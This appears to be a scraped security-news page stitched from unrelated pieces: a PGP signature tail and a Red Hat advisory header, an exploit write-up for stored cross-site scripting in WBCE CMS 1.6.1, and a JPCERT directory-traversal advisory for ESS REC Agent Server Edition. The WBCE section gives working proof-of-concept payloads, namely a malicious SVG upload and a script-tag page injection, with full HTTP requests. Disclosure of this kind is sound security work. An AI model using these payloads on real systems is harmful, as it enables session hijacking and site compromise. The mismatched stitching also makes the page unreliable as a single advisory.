DuTtEA0m0P7doAAFE4JVVYKjV6B4Ips6viQE3D960MmwFX3sz0XK7Vh2rz1No01G  
vsuJdlzejqL39eAaoL/+6REO/PsSnPyWejgFywxTSGWlomfuPo7R1I2vlqnEbcMc  
Cx708HPPrQK2ZZD8FpfreYSGDQWUbjKorJHl6yH/XHzl8wCC9abTTkwKXK35iW40  
57HU6StsWPsjiatE6loPROlQGXs3cbi1j93px8XZ3f0CFamqEFe8T/IP7rbdZq23  
RK9sFLICiGohJKhUQ2yyqZC6UPvEGxFYEw5RpG850JhG8Ov4VnAusylMUNnKYGYy  
lep4uIV5fwHU6AxVUkwwog9hdltX2igh05KdusbmxpA5vJdE6IhpU5itLhZu34TR  
/SVxQnNSTrJny9WKPVycpBshb+jRYFB8gnEG+GJwY1vuO3lRqwMbu3WUaNWwRny/  
KFSf0a7BsFY=  
=5KHr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3319-01

WBCE CMS version 1.6.1 suffers from a cross site scripting vulnerability.

    Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)Version: 1.6.1Bugs:  XSSTechnology: PHPVendor URL: https://wbce-cms.org/Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1Date of found: 03-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1Host: localhostContent-Length: 976sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-platform: "Linux"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtOAccept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167Connection: close------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="reqid"187de34ea92ac------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="cmd"upload------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="target"l1_Lw------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="mtime[]"1683056102------WebKitFormBoundary5u4r3pOGl4EnuBtO--3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)========================================================================================================================###XSS-2###1. go to pages  (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)2. add page3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3Epoc request:POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1Host: localhostContent-Length: 143Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475Connection: closepage_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

WBCE CMS 1.6.1 Cross Site Scripting

Directory traversal vulnerability in ESS REC Agent Server Edition series allows an authenticated attacker to view or alter an arbitrary file on the server. Affected products and versions are as follows: ESS REC Agent Server Edition for Linux V1.0.0 to V1.4.3, ESS REC Agent Server Edition for Solaris V1.1.0 to V1.4.0, ESS REC Agent Server Edition for HP-UX V1.1.0 to V1.4.0, and ESS REC Agent Server Edition for AIX V1.2.0 to V1.4.1

Published:2023/05/26  Last Updated:2023/05/26

**Overview**

ESS REC Agent Server Edition for Linux etc. contain a directory traversal vulnerability.

**Products Affected**

*   ESS REC Agent Server Edition for Linux V1.0.0 to V1.4.3
*   ESS REC Agent Server Edition for Solaris V1.1.0 to V1.4.0
*   ESS REC Agent Server Edition for HP-UX V1.1.0 to V1.4.0
*   ESS REC Agent Server Edition for AIX V1.2.0 to V1.4.1

**Description**

ESS REC Agent Server Edition for Linux etc. provided by Encourage Technologies Co.,Ltd. contain a directory traversal vulnerability (CWE-23).

**Impact**

Arbitrary files on the server may be viewed or altered by an attacker.

**Solution**

**Update the software**  
Update the software to the latest version according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:L/AC:L/Au:S/C:C/I:C/A:C

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Hayato Ushimaru of Cyber Defense Institute, Inc. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

Tag

#linux